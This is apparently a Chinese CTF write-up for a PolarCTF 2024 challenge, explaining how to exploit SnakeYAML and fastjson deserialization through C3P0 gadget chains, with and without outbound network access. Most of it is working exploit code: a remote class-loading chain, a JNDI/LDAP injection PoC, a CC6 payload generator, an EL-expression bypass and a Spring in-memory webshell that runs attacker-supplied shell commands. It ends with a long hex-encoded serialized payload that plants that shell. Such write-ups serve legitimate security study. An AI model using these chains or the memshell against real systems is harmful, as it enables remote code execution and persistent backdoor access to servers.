由Snake YAML反序列化漏洞引出的出网与不出网情况下C3P0链子的利用
前言
今天打了PolarCTF秋季个人挑战赛的一个压轴题:不出网情况下Snake YAML配合c3p0反序列化链Hex字节码加载利用,正好学习总结一下出网与不出网情况下gadget的利用
C3P0 则是其中一个开源的 JDBC 连接池,目前默认使用 C3P0 连接池的有 hibernate 框架。JDBC 是 Java DataBase Connectivity 的缩写,它是 Java 程序访问数据库的标准接口。
Gadget
三种利用方式:
- URLClassLoader 远程类加载
- 出网JNDI 注入
- 不出网利用 HEX 序列化字节加载器进行反序列化
### 利用前提
c3p0 版本 0.9.5.2
<dependency>
<groupId>com.mchange</groupId>
<artifactId>c3p0</artifactId>
<version>0.9.5.2</version>
</dependency>
URLClassLoader 远程类加载利用链
漏洞点在PoolBackedDataSourceBase
利用链
PoolBackedDataSourceBase#readObject->
ReferenceIndirector#getObject->
ReferenceableUtils#referenceToObject->
of(ObjectFactory)#getObjectInstancePoolBackedDataSourceBase中的 readObject是链子的触发点, 发现 ReferenceableUtils.referenceToObject 的referenceToObject方法中如果我们传入了一个远程工厂类,他会对远程工厂类进行解析,然后对 URL 进行获取,通过 URLClassLoader 去进行类加载。
我们创建的connectionPoolDataSource 类中 reference 对象中包含了恶意类地址
恶意类exp准备如下
public class exp {
public exp() throws Exception{
Runtime.getRuntime().exec("calc");
}
}
需要重写一个getReference方法
exp如下
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;
import java.io.*;
import java.lang.reflect.Field;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;
public class C3P01 {
public static class C3P0 implements ConnectionPoolDataSource, Referenceable{
@Override
public Reference getReference() throws NamingException {
return new Reference("ExpClass","exp","http://127.0.0.1:8888/");
}
@Override
public PooledConnection getPooledConnection() throws SQLException {
return null;
}
@Override
public PooledConnection getPooledConnection(String user, String password) throws SQLException {
return null;
}
@Override
public PrintWriter getLogWriter() throws SQLException {
return null;
}
@Override
public void setLogWriter(PrintWriter out) throws SQLException {
}
@Override
public void setLoginTimeout(int seconds) throws SQLException {
}
@Override
public int getLoginTimeout() throws SQLException {
return 0;
}
@Override
public Logger getParentLogger() throws SQLFeatureNotSupportedException {
return null;
}
}
public static void unserialize(byte[] bytes) throws Exception{
try(ByteArrayInputStream bain = new ByteArrayInputStream(bytes);
ObjectInputStream oin = new ObjectInputStream(bain)){
oin.readObject();
}
}
public static byte[] serialize(ConnectionPoolDataSource lp) throws Exception{
PoolBackedDataSourceBase poolBackedDataSourceBase = new PoolBackedDataSourceBase(false);
Field connectionPoolDataSourceField = PoolBackedDataSourceBase.class.getDeclaredField("connectionPoolDataSource");
connectionPoolDataSourceField.setAccessible(true);
connectionPoolDataSourceField.set(poolBackedDataSourceBase,lp);
try(ByteArrayOutputStream baout = new ByteArrayOutputStream();
ObjectOutputStream oout = new ObjectOutputStream(baout)){
oout.writeObject(poolBackedDataSourceBase);
return baout.toByteArray();
}
}
public static void main(String[] args) throws Exception{
C3P0 exp = new C3P0();
byte[] bytes = serialize(exp);
unserialize(bytes);
}
}
出网JNDI注入链子
JndiRefForwardingDataSource的dereference()方法中有look,并且jndiName通过getJndiName()获取,可造成JNDI注入
注意:JNDI 注入的这条链子依赖于 jackson 或者 fastjson 的反序列化前置才能进行
这里的漏洞开始触发点是由 FastJson 或者 jackson 的 set 方法调用触发的,本质上还是调用 JndiRefConnectionPoolDataSource 下的 setTime 方法
链子如下
#修改jndiName,用于最后的lookup(JndiName)->
JndiRefConnectionPoolDataSource#setJndiName ->
JndiRefForwardingDataSource#setJndiName
#JNDI调用
JndiRefConnectionPoolDataSource#setLoginTime ->
WrapperConnectionPoolDataSource#setLoginTime ->
JndiRefForwardingDataSource#setLoginTimeout ->
JndiRefForwardingDataSource#inner ->
JndiRefForwardingDataSource#dereference() ->
Context#lookup
fastsjson 版本是 1.2.47 版本,所以打的 payload 需要通过 Class 类加载先把JndiRefConnectionPoolDataSource加载缓存 mapping 中绕过 checkautotype 的检测
<dependency>
<groupId>com.alibaba</groupId>
<artifactId>fastjson</artifactId>
<version>1.2.47</version>
</dependency>
<dependency>
<groupId>commons-collections</groupId>
<artifactId>commons-collections</artifactId>
<version>3.2.1</version>
</dependency>
fastjson poc如下:
package JNDI;
import com.alibaba.fastjson.JSON;
import javax.naming.InitialContext;
public class POC {
public static void main(String[] args) throws Exception{
String payload="{\"a\":" +
"{\"@type\": \"java.lang.Class\",\"val\": \"com.mchange.v2.c3p0.JndiRefConnectionPoolDataSource\"}," +
"\"stoocea\":" +
"{\"@type\": \"com.mchange.v2.c3p0.JndiRefConnectionPoolDataSource\"," +
"\"JndiName\": \"ldap://127.0.0.1:10389/cn=TestLdap,dc=example,dc=com\"," +
"\"LoginTimeout\": 0}" +
"}";
JSON.parseObject(payload);
}
}
不出网Hex字节码加载利用
不出网的情况下,C3P0链可以和fastjson,Snake YAML , JYAML,Yamlbeans , JacksonBlazeds,Red5, Castor等配合使用(调用setter和初始化方法)
链子如下
WrapperConnectionPoolDataSource#WrapperConnectionPoolDataSource->
C3P0ImplUtils#parseUserOverridesAsString->
SerializableUtils#fromByteArray->
SerializableUtils#deserializeFromByteArray->
SerializableUtils
先用CC6生成hexExp16进制数据
package com.c3p0;
import com.mchange.v2.c3p0.WrapperConnectionPoolDataSource;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;
public class getPayload {
public static void main(String[] args) throws Exception {
Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer(
"getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
new InvokerTransformer(
"invoke", new Class[]{Object.class, Object[].class}, new Object[]{Runtime.class, null}),
new InvokerTransformer(
"exec", new Class[]{String.class}, new Object[]{"calc"})
};
Transformer[] fakeTransformers = new Transformer[] {new
ConstantTransformer(1)};
Transformer transformerChain = new ChainedTransformer(fakeTransformers);
Map map = new HashMap();
Map lazyMap = LazyMap.decorate(map, transformerChain);
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "test");
Map expMap = new HashMap();
expMap.put(tiedMapEntry, "xxx");
lazyMap.remove("test");
Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
f.setAccessible(true);
f.set(transformerChain, transformers);
ByteArrayOutputStream baos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(baos);
oos.writeObject(expMap);
oos.close();
System.out.println("FJ的hexEXP填这个:"+bytesToHexString(baos.toByteArray())+ "z");
String ser = "HexAsciiSerializedMap:" + bytesToHexString(baos.toByteArray()) + "z";
WrapperConnectionPoolDataSource exp = new WrapperConnectionPoolDataSource();
exp.setUserOverridesAsString(ser);
}
public static byte[] toByteArray(InputStream in) throws IOException {
byte[] classBytes;
classBytes = new byte[in.available()];
in.read(classBytes);
in.close();
return classBytes;
}
public static String bytesToHexString(byte[] bArray) {
int length = bArray.length;
StringBuffer sb = new StringBuffer(length);
for(int i = 0; i < length; ++i) {
String sTemp = Integer.toHexString(255 & bArray[i]);
if (sTemp.length() < 2) {
sb.append(0);
}
sb.append(sTemp.toUpperCase());
}
return sb.toString();
}
}
配
hexExp配合FastJson(版本为1.4.7)打不出网
{ "a": { "@type": "java.lang.Class", "val": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource" }, "b": { "@type": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource", "userOverridesAsString": "HexAsciiSerializedMap:hexExp" } }
EL 表达式打C3P0的不出网利用
依赖如下
<dependency>
<groupId>org.apache.el</groupId>
<artifactId>com.springsource.org.apache.el</artifactId>
<version>7.0.26</version>
</dependency>
<!-- https://mvnrepository.com/artifact/javax.el/el-api -->
<dependency>
<groupId>javax.el</groupId>
<artifactId>el-api</artifactId>
<version>2.2</version>
</dependency>
需要把 reference 中的工厂指定为 beanFactory
重写getReference()方法
package HighbyPass;
import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.naming.StringRefAddr;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;
import java.io.PrintWriter;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;
import org.apache.naming.ResourceRef;
public class CPDS implements ConnectionPoolDataSource , Referenceable {
@Override
public Reference getReference() throws NamingException {
ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);
ref.add(new StringRefAddr("forceString", "x=eval"));
ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance()" +
".getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])']" +
"(['calc']).start()\")"));
return ref;
}
@Override
public PooledConnection getPooledConnection() throws SQLException {
return null;
}
@Override
public PooledConnection getPooledConnection(String user, String password) throws SQLException {
return null;
}
@Override
public PrintWriter getLogWriter() throws SQLException {
return null;
}
@Override
public void setLogWriter(PrintWriter out) throws SQLException {
}
@Override
public void setLoginTimeout(int seconds) throws SQLException {
}
@Override
public int getLoginTimeout() throws SQLException {
return 0;
}
@Override
public Logger getParentLogger() throws SQLFeatureNotSupportedException {
return null;
}
}
EXP如下:
package HighbyPass;
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
public class POCandEXP {
public static void main(String[] args) throws Exception {
PoolBackedDataSourceBase pbds=new PoolBackedDataSourceBase(false);
Class cls= pbds.getClass();
Field field=cls.getDeclaredField("connectionPoolDataSource");
field.setAccessible(true);
field.set(pbds,new CPDS());
serialize(pbds);
}
//可利用生成payload
public static String serialize(PoolBackedDataSourceBase pbds) throws Exception{
ByteArrayOutputStream bao = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(bao);
oos.writeObject(pbds);
byte[] temp=bao.toByteArray();
Base64.Encoder encoder=Base64.getEncoder();
String payload=encoder.encodeToString(temp);
System.out.println(payload);
return payload;
}
}
例题 PolarCTF 2024秋季赛
考点:不出网情况下Snake YAML配合c3p0反序列化链Hex字节码加载利用
题目源码如下
package com.polarctf.controller;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.PostMapping;
import org.yaml.snakeyaml.Yaml;
@Controller
/* loaded from: LoadController.class */
public class LoadController {
@PostMapping({"/load"})
public Object load(String data) {
System.out.println("Received data: " + data);
return new Yaml().load(data);
}
}
题目给了依赖 CB以及C3P0
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>com.polarctf</groupId>
<artifactId>SnakeYaml</artifactId>
<version>1.0-SNAPSHOT</version>
<properties>
<maven.compiler.source>8</maven.compiler.source>
<maven.compiler.target>8</maven.compiler.target>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
</properties>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.2.1.RELEASE</version>
<relativePath/> <!-- lookup parent from repository -->
</parent>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
<dependency>
<groupId>com.mchange</groupId>
<artifactId>c3p0</artifactId>
<version>0.9.5.2</version>
</dependency>
<dependency>
<groupId>org.yaml</groupId>
<artifactId>snakeyaml</artifactId>
<version>1.33</version>
</dependency>
<dependency>
<groupId>commons-beanutils</groupId>
<artifactId>commons-beanutils</artifactId>
<version>1.9.2</version>
</dependency>
</dependencies>
<build>
<finalName>SnakeYaml</finalName>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
</plugins>
</build>
</project>
lib包中还有CC3.2.1依赖
![[3c1b89e5d855d4461c59118a0a100760.png]]
有CC3.2.1依赖直接打CC6
package exp;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;
public class CC6WithTp {
public static void main(String[] args) throws Exception {
TemplatesImpl templates = new TemplatesImpl();
Class ct = templates.getClass();
byte[] code = Files.readAllBytes(Paths.get("C:\\Users\\86150\\Desktop\\JarDebug\\target\\classes\\exp\\SpringControllerMemShell3.class"));
byte[][] bytes = {code};
Field ctDeclaredField = ct.getDeclaredField("_bytecodes");
ctDeclaredField.setAccessible(true);
ctDeclaredField.set(templates,bytes);
Field nameField = ct.getDeclaredField("_name");
nameField.setAccessible(true);
nameField.set(templates,"Z3");
Field tfactory = ct.getDeclaredField("_tfactory");
tfactory.setAccessible(true);
tfactory.set(templates,new TransformerFactoryImpl());
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(templates),
new InvokerTransformer("newTransformer",null,null)
};
ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);
Map<Object,Object> map = new HashMap<>();
Map<Object,Object> lazyMap = LazyMap.decorate(map,new ConstantTransformer(1));
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap,"aaa");
//
// //查看构造函数,传入的key和value
HashMap<Object, Object> map1 = new HashMap<>();
// //map的固定语法,必须要put进去,这里的put会将链子连起来,触发命令执行
map1.put(tiedMapEntry, "bbb");
lazyMap.remove("aaa");
Class c = LazyMap.class;
Field factoryField = c.getDeclaredField("factory");
factoryField.setAccessible(true);
factoryField.set(lazyMap,chainedTransformer);
//
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
objectOutputStream.writeObject(map1);
serialize(map1);
}
public static void serialize(Object obj) throws IOException {
ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("./a.bin"));
objectOutputStream.writeObject(obj);
}
public static Object unserialize(String filename) throws IOException, ClassNotFoundException {
ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(filename));
Object object = objectInputStream.readObject();
return object;
}
}
不出网我们构造spring内存马
package exp;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.PrintWriter;
import java.lang.reflect.Method;
/**
* 适用于 SpringMVC+Tomcat的环境,以及Springboot 2.x 环境.
* 因此比 SpringControllerMemShell.java 更加通用
* Springboot 1.x 和 3.x 版本未进行测试
*/
@Controller
public class SpringControllerMemShell3 extends AbstractTranslet {
public SpringControllerMemShell3() {
try {
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
Method method2 = SpringControllerMemShell3.class.getMethod("test");
RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();
Method getMappingForMethod = mappingHandlerMapping.getClass().getDeclaredMethod("getMappingForMethod", Method.class, Class.class);
getMappingForMethod.setAccessible(true);
RequestMappingInfo info =
(RequestMappingInfo) getMappingForMethod.invoke(mappingHandlerMapping, method2, SpringControllerMemShell3.class);
SpringControllerMemShell3 springControllerMemShell = new SpringControllerMemShell3("aaa");
mappingHandlerMapping.registerMapping(info, springControllerMemShell, method2);
} catch (Exception e) {
}
}
@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}
public SpringControllerMemShell3(String aaa) {
}
@RequestMapping("/a")
public void test() throws IOException {
HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();
HttpServletResponse response = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getResponse();
try {
String arg0 = request.getParameter("cmd");
PrintWriter writer = response.getWriter();
if (arg0 != null) {
String o = "";
ProcessBuilder p;
if (System.getProperty("os.name").toLowerCase().contains("win")) {
p = new ProcessBuilder(new String[]{"cmd.exe", "/c", arg0});
} else {
p = new ProcessBuilder(new String[]{"/bin/sh", "-c", arg0});
}
java.util.Scanner c = new java.util.Scanner(p.start().getInputStream()).useDelimiter("\\A");
o = c.hasNext() ? c.next() : o;
c.close();
writer.write(o);
writer.flush();
writer.close();
} else {
response.sendError(404);
}
} catch (Exception e) {
}
}
}
之后直接传入data后便可rce
data=!!com.mchange.v2.c3p0.WrapperConnectionPoolDataSource
userOverridesAsString: HexAsciiSerializedMap:16进制反序列化数据;
成功写入内存马!
payload如下
data=!!com.mchange.v2.c3p0.WrapperConnectionPoolDataSource
userOverridesAsString: HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C77080000001000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B78707400036161617372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000027372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E000378707372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000949000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785A00155F75736553657276696365734D656368616E69736D4C00195F61636365737345787465726E616C5374796C6573686565747400124C6A6176612F6C616E672F537472696E673B4C000B5F617578436C617373657374003B4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F486173687461626C653B5B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D6571007E00124C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF00740003616C6C70757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E00200007870000015E4CAFEBABE0000003400F60A003B00800A008100820800830B008400850700860700870B0005008807008908006507008A0A000A008B07008C07008D0A000C008E0A0014008F0800490700900A000A00910A001100920700930A001100940700950800630A000800960A000600970700980700990A001B009A0A001B009B08009C0B009D009E0B009F00A00800A10800A20A00A300A40A002800A50800A60A002800A70700A80700A90800AA0800AB0A002700AC0800AD0800AE0700AF0A002700B00A00B100B20A002E00B30800B40A002E00B50A002E00B60A002E00B70A002E00B80A00B900BA0A00B900BB0A00B900B80B009F00BC0700BD0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010007636F6E746578740100374C6F72672F737072696E676672616D65776F726B2F7765622F636F6E746578742F5765624170706C69636174696F6E436F6E746578743B0100156D617070696E6748616E646C65724D617070696E670100544C6F72672F737072696E676672616D65776F726B2F7765622F736572766C65742F6D76632F6D6574686F642F616E6E6F746174696F6E2F526571756573744D617070696E6748616E646C65724D617070696E673B0100076D6574686F643201001A4C6A6176612F6C616E672F7265666C6563742F4D6574686F643B0100026D7301004E4C6F72672F737072696E676672616D65776F726B2F7765622F736572766C65742F6D76632F636F6E646974696F6E2F526571756573744D6574686F647352657175657374436F6E646974696F6E3B0100136765744D617070696E67466F724D6574686F64010004696E666F01003F4C6F72672F737072696E676672616D65776F726B2F7765622F736572766C65742F6D76632F6D6574686F642F526571756573744D617070696E67496E666F3B010018737072696E67436F6E74726F6C6C65724D656D5368656C6C01001F4C6578702F537072696E67436F6E74726F6C6C65724D656D5368656C6C333B010001650100154C6A6176612F6C616E672F457863657074696F6E3B0100047468697301000D537461636B4D61705461626C650700890700980100097472616E73666F726D010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B01000868616E646C6572730100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A457863657074696F6E730700BE0100104D6574686F64506172616D65746572730100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B010015284C6A6176612F6C616E672F537472696E673B29560100036161610100124C6A6176612F6C616E672F537472696E673B010004746573740100017001001A4C6A6176612F6C616E672F50726F636573734275696C6465723B0100016F010001630100134C6A6176612F7574696C2F5363616E6E65723B010004617267300100067772697465720100154C6A6176612F696F2F5072696E745772697465723B010007726571756573740100274C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B010008726573706F6E73650100284C6A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73653B0700BF0700C00700A90700C10700A80700AF0700C201001952756E74696D6556697369626C65416E6E6F746174696F6E730100384C6F72672F737072696E676672616D65776F726B2F7765622F62696E642F616E6E6F746174696F6E2F526571756573744D617070696E673B01000576616C75650100022F6101000A536F7572636546696C6501001E537072696E67436F6E74726F6C6C65724D656D5368656C6C332E6A61766101002B4C6F72672F737072696E676672616D65776F726B2F73746572656F747970652F436F6E74726F6C6C65723B0C003C003D0700C30C00C400C50100396F72672E737072696E676672616D65776F726B2E7765622E736572766C65742E44697370617463686572536572766C65742E434F4E544558540700C60C00C700C80100356F72672F737072696E676672616D65776F726B2F7765622F636F6E746578742F5765624170706C69636174696F6E436F6E746578740100526F72672F737072696E676672616D65776F726B2F7765622F736572766C65742F6D76632F6D6574686F642F616E6E6F746174696F6E2F526571756573744D617070696E6748616E646C65724D617070696E670C00C900CA01001D6578702F537072696E67436F6E74726F6C6C65724D656D5368656C6C3301000F6A6176612F6C616E672F436C6173730C00CB00CC01004C6F72672F737072696E676672616D65776F726B2F7765622F736572766C65742F6D76632F636F6E646974696F6E2F526571756573744D6574686F647352657175657374436F6E646974696F6E0100356F72672F737072696E676672616D65776F726B2F7765622F62696E642F616E6E6F746174696F6E2F526571756573744D6574686F640C003C00CD0C00CE00CF0100186A6176612F6C616E672F7265666C6563742F4D6574686F640C00D000CC0C00D100D20100106A6176612F6C616E672F4F626A6563740C00D300D401003D6F72672F737072696E676672616D65776F726B2F7765622F736572766C65742F6D76632F6D6574686F642F526571756573744D617070696E67496E666F0C003C00620C00D500D60100136A6176612F6C616E672F457863657074696F6E0100406F72672F737072696E676672616D65776F726B2F7765622F636F6E746578742F726571756573742F536572766C657452657175657374417474726962757465730C00D700D80C00D900DA010003636D640700BF0C00DB00DC0700C00C00DD00DE0100000100076F732E6E616D650700DF0C00E000DC0C00E100E201000377696E0C00E300E40100186A6176612F6C616E672F50726F636573734275696C6465720100106A6176612F6C616E672F537472696E67010007636D642E6578650100022F630C003C00E50100072F62696E2F73680100022D630100116A6176612F7574696C2F5363616E6E65720C00E600E70700E80C00E900EA0C003C00EB0100025C410C00EC00ED0C00EE00EF0C00F000E20C00F1003D0700C10C00F200620C00F3003D0C00F400F5010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C6574010039636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F5472616E736C6574457863657074696F6E0100256A617661782F736572766C65742F687474702F48747470536572766C6574526571756573740100266A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73650100136A6176612F696F2F5072696E745772697465720100136A6176612F696F2F494F457863657074696F6E01003C6F72672F737072696E676672616D65776F726B2F7765622F636F6E746578742F726571756573742F52657175657374436F6E74657874486F6C64657201001863757272656E74526571756573744174747269627574657301003D28294C6F72672F737072696E676672616D65776F726B2F7765622F636F6E746578742F726571756573742F52657175657374417474726962757465733B0100396F72672F737072696E676672616D65776F726B2F7765622F636F6E746578742F726571756573742F526571756573744174747269627574657301000C676574417474726962757465010027284C6A6176612F6C616E672F537472696E673B49294C6A6176612F6C616E672F4F626A6563743B0100076765744265616E010025284C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F4F626A6563743B0100096765744D6574686F64010040284C6A6176612F6C616E672F537472696E673B5B4C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F7265666C6563742F4D6574686F643B01003B285B4C6F72672F737072696E676672616D65776F726B2F7765622F62696E642F616E6E6F746174696F6E2F526571756573744D6574686F643B2956010008676574436C61737301001328294C6A6176612F6C616E672F436C6173733B0100116765744465636C617265644D6574686F6401000D73657441636365737369626C65010004285A2956010006696E766F6B65010039284C6A6176612F6C616E672F4F626A6563743B5B4C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B01000F72656769737465724D617070696E6701006E284C6F72672F737072696E676672616D65776F726B2F7765622F736572766C65742F6D76632F6D6574686F642F526571756573744D617070696E67496E666F3B4C6A6176612F6C616E672F4F626A6563743B4C6A6176612F6C616E672F7265666C6563742F4D6574686F643B295601000A6765745265717565737401002928294C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B01000B676574526573706F6E736501002A28294C6A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73653B01000C676574506172616D65746572010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B01000967657457726974657201001728294C6A6176612F696F2F5072696E745772697465723B0100106A6176612F6C616E672F53797374656D01000B67657450726F706572747901000B746F4C6F7765724361736501001428294C6A6176612F6C616E672F537472696E673B010008636F6E7461696E7301001B284C6A6176612F6C616E672F4368617253657175656E63653B295A010016285B4C6A6176612F6C616E672F537472696E673B2956010005737461727401001528294C6A6176612F6C616E672F50726F636573733B0100116A6176612F6C616E672F50726F6365737301000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B010018284C6A6176612F696F2F496E70757453747265616D3B295601000C75736544656C696D69746572010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F7574696C2F5363616E6E65723B0100076861734E65787401000328295A0100046E657874010005636C6F73650100057772697465010005666C75736801000973656E644572726F720100042849295600210008003B0000000000050001003C003D0001003E0000015400060008000000882AB70001B80002120303B900040300C000054C2B1206B900070200C000064D1208120903BD000AB6000B4EBB000C5903BD000DB7000E3A042CB6000F121005BD000A59031211535904120A53B600123A05190504B6001319052C05BD001459032D535904120853B60015C000163A06BB0008591217B700183A072C190619072DB60019A700044CB10001000400830086001A0003003F0000003A000E0000001F0004002100130022001F0023002B002400380026005100270057002800670029006F002B007A002C0083002F0086002D0087003000400000005C000900130070004100420001001F0064004300440002002B00580045004600030038004B00470048000400510032004900460005006F0014004A004B0006007A0009004C004D0007008